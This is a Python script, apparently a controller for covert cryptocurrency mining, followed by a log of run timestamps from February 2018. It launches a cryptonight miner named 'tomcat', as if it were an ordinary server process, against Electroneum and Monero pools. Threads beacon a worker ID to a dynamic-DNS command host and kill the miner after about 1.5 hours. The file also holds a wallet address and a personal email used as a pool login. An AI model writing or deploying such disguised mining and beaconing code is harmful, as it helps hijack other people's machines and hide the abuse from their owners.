import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:10.306246
#2018-02-17 16:37:05.874631
#2018-02-17 18:25:01.504571
#2018-02-17 20:13:06.605478
#2018-02-17 22:01:05.885847
#2018-02-17 23:44:06.980766
#2018-02-18 01:34:01.731573
#2018-02-18 03:21:06.068565
#2018-02-18 05:09:06.013608
#2018-02-18 07:01:06.414704
#2018-02-18 08:50:03.507670
#2018-02-18 10:37:07.529644
#2018-02-18 12:22:04.828668
#2018-02-18 14:09:05.748151
#2018-02-18 15:59:05.828529
#2018-02-18 17:49:01.279810
#2018-02-18 19:35:07.777566
#2018-02-18 21:20:08.947102
#2018-02-18 23:08:05.824343
#2018-02-19 00:55:04.192284
#2018-02-19 02:42:05.846299
#2018-02-19 04:29:03.588623
#2018-02-19 06:14:01.700987
#2018-02-19 08:02:07.062811
#2018-02-19 09:52:07.212093
#2018-02-19 11:41:04.526029
#2018-02-19 13:27:01.457007
#2018-02-19 15:14:06.300177
#2018-02-19 17:03:01.809656
#2018-02-19 18:49:05.585231
#2018-02-19 20:40:02.062760
#2018-02-19 22:26:06.347589
#2018-02-20 00:13:04.709284
#2018-02-20 02:01:07.569686
#2018-02-20 03:51:07.493656
#2018-02-20 05:36:06.218154
#2018-02-20 07:21:04.209077
#2018-02-20 09:07:07.835367
#2018-02-20 10:49:07.992890
#2018-02-20 12:36:06.016307
#2018-02-20 14:22:07.083685
#2018-02-20 16:07:04.328375
#2018-02-20 17:53:09.187842
#2018-02-20 19:44:06.359732
#2018-02-20 21:33:07.765130
#2018-02-20 23:17:01.835718
#2018-02-21 01:01:06.328441
#2018-02-21 02:48:01.884057
#2018-02-21 04:37:03.666698
#2018-02-21 06:24:07.704700
#2018-02-21 08:09:01.587671
#2018-02-21 09:54:08.125926
#2018-02-21 11:43:02.158649
#2018-02-21 13:33:06.751809
#2018-02-21 15:18:07.591462
#2018-02-21 17:07:10.006817
#2018-02-21 18:54:04.059219
#2018-02-21 20:44:05.457207
#2018-02-21 22:30:03.899438
#2018-02-22 00:19:02.024782
#2018-02-22 02:06:07.357518
#2018-02-22 03:53:05.868974
#2018-02-22 05:40:07.567339
#2018-02-22 07:25:07.545115
#2018-02-22 09:14:04.116327
#2018-02-22 11:01:10.083721
#2018-02-22 12:48:07.907236
#2018-02-22 14:36:01.330535
#2018-02-22 16:22:05.966011
#2018-02-22 18:10:03.236594
#2018-02-22 20:01:01.310868
#2018-02-22 21:49:08.785479
#2018-02-22 23:37:07.560027
#2018-02-23 01:26:05.636159
#2018-02-23 03:12:03.982377
#2018-02-23 04:58:05.154032
#2018-02-23 06:42:05.545693
#2018-02-23 08:32:01.374770
#2018-02-23 10:46:06.845466
#2018-02-23 12:44:04.466884
#2018-02-23 14:28:07.708118
#2018-02-23 16:19:01.525233
#2018-02-23 18:06:04.409238
#2018-02-23 19:50:07.192367
#2018-02-23 21:35:08.236242
#2018-02-23 23:24:04.203108
#2018-02-24 01:17:05.295495
#2018-02-24 03:08:06.705921
#2018-02-24 04:54:07.782594
#2018-02-24 06:39:03.729723
#2018-02-24 08:28:01.762338
#2018-02-24 10:14:03.705004
#2018-02-24 12:09:04.306607
#2018-02-24 13:56:05.758383
#2018-02-24 15:46:01.726585
#2018-02-24 17:39:06.282554
#2018-02-24 19:25:07.312068
#2018-02-24 21:15:09.552394
#2018-02-24 23:52:03.883724
#2018-02-25 03:10:01.434638
#2018-02-25 07:05:03.932904